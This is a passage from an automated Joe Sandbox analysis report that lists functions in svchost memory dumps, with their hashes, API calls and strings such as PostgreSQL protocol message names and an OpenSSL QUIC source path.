                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputcisprint
                                                                                            • String ID: NoticeResponse$mismatched message length: consumed %d, expected %d
                                                                                            • API String ID: 3787447051-1096294206
                                                                                            • Opcode ID: 042305df349cd53864de0ec0bc1164dcf867d594b70c2fffbf240a790311e358
                                                                                            • Instruction ID: 30849ac2a5cd467965b78c6bca181862795bc02a9463b78318e9a858c93af40b
                                                                                            • Opcode Fuzzy Hash: 042305df349cd53864de0ec0bc1164dcf867d594b70c2fffbf240a790311e358
                                                                                            • Instruction Fuzzy Hash: FA01D17271A68682F651CB15F061BE96362EB847D8F482032EF0E17756CF3ED58AC718
                                                                                            Function 00007FFDA36DD0B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: strncmpstrtoul
                                                                                            • String ID: INSERT
                                                                                            • API String ID: 3007069910-542497690
                                                                                            • Opcode ID: 15447babf44f5e002d2705c48ed06f6a3f34c2e22d3b932a3b2d8c3c33783d55
                                                                                            • Instruction ID: e30ddabc31dff159a73330c3466dc0d91765be04659d10f1866670533b05b0d0
                                                                                            • Opcode Fuzzy Hash: 15447babf44f5e002d2705c48ed06f6a3f34c2e22d3b932a3b2d8c3c33783d55
                                                                                            • Instruction Fuzzy Hash: A3F0F012F2BA4341FF909B6598317352752EF50B84F0C3430C98D56386EF1ED4498344
                                                                                            Function 00007FFDA36EAC3F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputc
                                                                                            • String ID: PortalSuspended$mismatched message length: consumed %d, expected %d
                                                                                            • API String ID: 1992160199-3028255369
                                                                                            • Opcode ID: 6abfe9258297e4a93dcf2281509757e0a29289b16473b74458a6a101103af6d8
                                                                                            • Instruction ID: 52c4f3da29594c6ec52460be6668071e0f4f6cb3cbb5ff7341aa6245eec28be4
                                                                                            • Opcode Fuzzy Hash: 6abfe9258297e4a93dcf2281509757e0a29289b16473b74458a6a101103af6d8
                                                                                            • Instruction Fuzzy Hash: 56F09072B1A54682FA50DB15F061BF92362EB807DCF482032DE0E17342CE3ED59AC708
                                                                                            Function 00007FFDA36EAA6F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputc
                                                                                            • String ID: EmptyQueryResponse$mismatched message length: consumed %d, expected %d
                                                                                            • API String ID: 1992160199-3205523542
                                                                                            • Opcode ID: acbf788f0638779820dcd1786c7ac39cda0842c07abf6d166f1c963db8a3d596
                                                                                            • Instruction ID: 4cc3f21a12dcd36c8fd8a1f22f53d737d7b8c95b903d890cbbcbdcee82fef090
                                                                                            • Opcode Fuzzy Hash: acbf788f0638779820dcd1786c7ac39cda0842c07abf6d166f1c963db8a3d596
                                                                                            • Instruction Fuzzy Hash: 7AF06D62B1A54686FA50DB15E062BA92362EB807D8F482032DE0E17342CE3AD59AC708
                                                                                            Function 00007FFDA36EAAF3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputc
                                                                                            • String ID: NoData$mismatched message length: consumed %d, expected %d
                                                                                            • API String ID: 1992160199-3740840261
                                                                                            • Opcode ID: a2b42f46eddf8d4c2eb8fb75d465949b90df4443478b4bc0297e8268bc8038a2
                                                                                            • Instruction ID: 29efca8f07d2bc628507c93ce8bc35915ea1c0b2f6c9f15a3be216b0f5c4ac30
                                                                                            • Opcode Fuzzy Hash: a2b42f46eddf8d4c2eb8fb75d465949b90df4443478b4bc0297e8268bc8038a2
                                                                                            • Instruction Fuzzy Hash: 65F06D62B1A54682FA50DB15E162BA92362EB80798F482032DE0E17346CE3ED59AC708
                                                                                            Function 00007FFDA36EAE79 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputc
                                                                                            • String ID: Terminate$mismatched message length: consumed %d, expected %d
                                                                                            • API String ID: 1992160199-186112465
                                                                                            • Opcode ID: 6e547a04957a3293cd69399558c4b2cf10434273b90da3d874882b27262b1d6e
                                                                                            • Instruction ID: 81e6404683ca130aab5b6c741836763d7fc0a52446b235ae7787dbc9eeb7cb82
                                                                                            • Opcode Fuzzy Hash: 6e547a04957a3293cd69399558c4b2cf10434273b90da3d874882b27262b1d6e
                                                                                            • Instruction Fuzzy Hash: 0CF09072B1A55682FA50DB15F061BF92362EB807DCF482032DE0E17342CE3ED59AC718
                                                                                            Function 00007FFDA36EA6E1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputc
                                                                                            • String ID: CopyDone$mismatched message length: consumed %d, expected %d
                                                                                            • API String ID: 1992160199-165533431
                                                                                            • Opcode ID: 9c63d00afaad61cc0f5a37ab35828e7a7f37dfbdef257d42c3dc26f7b9b03bba
                                                                                            • Instruction ID: d618edd037c781dff4e674c2be66b00b38df1c7ebef836c7c3c0811a517dce0c
                                                                                            • Opcode Fuzzy Hash: 9c63d00afaad61cc0f5a37ab35828e7a7f37dfbdef257d42c3dc26f7b9b03bba
                                                                                            • Instruction Fuzzy Hash: 9FF09072B1A54682FA50DB15F061BF92362EB807DCF482032DE0E17342CE3ED59AC718
                                                                                            Function 00007FFDA36EA638 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputc
                                                                                            • String ID: CloseComplete$mismatched message length: consumed %d, expected %d
                                                                                            • API String ID: 1992160199-2521192578
                                                                                            • Opcode ID: 5247143c61b43af720aa10091ab06a6398bd60e1cd0a298573e7d4618f1d8d08
                                                                                            • Instruction ID: 90abab5100cb3bd4b7a501ae5cf8e57cdf6240d1aee9d6b5dd48441cf336dfca
                                                                                            • Opcode Fuzzy Hash: 5247143c61b43af720aa10091ab06a6398bd60e1cd0a298573e7d4618f1d8d08
                                                                                            • Instruction Fuzzy Hash: 9AF06D62B1A54682FA50DB15E061BA92362EB80798F482032DE0E17342CE3AD59AC718
                                                                                            Function 00007FFDA36EA620 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputc
                                                                                            • String ID: BindComplete$mismatched message length: consumed %d, expected %d
                                                                                            • API String ID: 1992160199-666356695
                                                                                            • Opcode ID: bfde9dda282d9bf131b604a22531f0ab72d6f1586674c596e60c2b778f9a4e64
                                                                                            • Instruction ID: 39d9a9a1155828858ded95276f0713221d45f9f3938e91bc08fc9d01a60b59ce
                                                                                            • Opcode Fuzzy Hash: bfde9dda282d9bf131b604a22531f0ab72d6f1586674c596e60c2b778f9a4e64
                                                                                            • Instruction Fuzzy Hash: F7F06DA2B1A64681FA50DB15E061BA92362EB80798F482032DE0E17346CE3AD58AC708
                                                                                            Function 00007FFDA36EA608 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputc
                                                                                            • String ID: ParseComplete$mismatched message length: consumed %d, expected %d
                                                                                            • API String ID: 1992160199-3656836847
                                                                                            • Opcode ID: 2ba5dec67f564cfc6e12e7384cc32b387355ce5683bd26650348b043a23d28f4
                                                                                            • Instruction ID: 67267b8b84ec464c9a807369892c8f361200c42ec71cf6354c3d594145560e86
                                                                                            • Opcode Fuzzy Hash: 2ba5dec67f564cfc6e12e7384cc32b387355ce5683bd26650348b043a23d28f4
                                                                                            • Instruction Fuzzy Hash: 71F06D62B1A64681FA50DB15E061BA92362EB80798F482032DE0E17346CE3AD58AC708
                                                                                            Function 00007FFDA364A440 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: H_delete
                                                                                            • String ID: ssl\quic\quic_lcidm.c
                                                                                            • API String ID: 3239526987-3923830422
                                                                                            • Opcode ID: 232aafc997d7999e1c6c17a4d80df4341fcd33b7748c27ad3f0d600700aad4e9
                                                                                            • Instruction ID: d20200ce136b5170478d5d394569f378574f111e78d95fe61d09e5b17698888d
                                                                                            • Opcode Fuzzy Hash: 232aafc997d7999e1c6c17a4d80df4341fcd33b7748c27ad3f0d600700aad4e9
                                                                                            • Instruction Fuzzy Hash: 04E01A91F0A50682FA109B57C8A5178A762EB8CFC4F1C9432EE0D9B367CE1ED4418318
                                                                                            Function 6601BA30 Relevance: 5.1, APIs: 4, Instructions: 125COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalLeaveSectionfree
                                                                                            • String ID:
                                                                                            • API String ID: 1679108487-0
                                                                                            • Opcode ID: 500263fb43dee4791e1e6a673451172170e6ad9135be3006d8eeec49efba4b7b
                                                                                            • Instruction ID: e36ba6a50b6231787f829567ba99692f9d2c64aa5cb6aea2564bc56613c0d97c
                                                                                            • Opcode Fuzzy Hash: 500263fb43dee4791e1e6a673451172170e6ad9135be3006d8eeec49efba4b7b
                                                                                            • Instruction Fuzzy Hash: 0F41063174EE1481F7159B85AA9031BAEA5FB59BC4FC84835CD1807B54EF7BD4A1C380
                                                                                            Function 00007FFDA36D33C0 Relevance: 5.1, APIs: 4, Instructions: 64COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$ErrorLastStartupmalloc
                                                                                            • String ID:
                                                                                            • API String ID: 2139478859-0
                                                                                            • Opcode ID: c1b7b147e9083f6c855934e1965602a425ceba7aacc208d876a385948deaf939
                                                                                            • Instruction ID: 8d2d9139116b26880d0addc983bd5d87bf7ad2d9616bf05e9c2900a629478e20
                                                                                            • Opcode Fuzzy Hash: c1b7b147e9083f6c855934e1965602a425ceba7aacc208d876a385948deaf939
                                                                                            • Instruction Fuzzy Hash: 24217F22B0AE4285FA45DF1191643B963A2AF44FC4F5C6470EE0D6BB56DF3EE8818358
                                                                                            Function 00007FFDA36D6A20 Relevance: 5.1, APIs: 4, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00007FFDA36DA810: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDA36D6A42,?,?,?,00007FFDA36D3380), ref: 00007FFDA36DA836
                                                                                              • Part of subcall function 00007FFDA36DA810: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDA36D6A42,?,?,?,00007FFDA36D3380), ref: 00007FFDA36DA850
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36D6A85
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36D6A99
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: freestrncmp
                                                                                            • String ID:
                                                                                            • API String ID: 1891267927-0
                                                                                            • Opcode ID: 38dd9ff49b41bcd66a20388cf46bf153bdee0f43bb64d8220b12d13a2ee80680
                                                                                            • Instruction ID: abdb90f20d9c36b7e62aee18ed14ef20b6e32fe516cd7d3d9879f131e35c6351
                                                                                            • Opcode Fuzzy Hash: 38dd9ff49b41bcd66a20388cf46bf153bdee0f43bb64d8220b12d13a2ee80680
                                                                                            • Instruction Fuzzy Hash: A8113D22B0AA4281FF848F15E2A43B92362EB54BC8F8C6030CA1D5A756DF7ED8D5C744
                                                                                            Function 00007FFDA36DAE50 Relevance: 5.0, APIs: 4, Instructions: 49COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: free
                                                                                            • String ID:
                                                                                            • API String ID: 1294909896-0
                                                                                            • Opcode ID: ec730df48e5626f3e40dff1944ecef16541db388a6c3708d3721763f4f39ad85
                                                                                            • Instruction ID: a94ec92126d1f81026dc317bdf6acd2028296fe6a95fe64c247030d1180bd68e
                                                                                            • Opcode Fuzzy Hash: ec730df48e5626f3e40dff1944ecef16541db388a6c3708d3721763f4f39ad85
                                                                                            • Instruction Fuzzy Hash: AC210333716BC2A3EA0E8B25D6502AAB768FB08B80F0C1135EB6907751CF39A171C344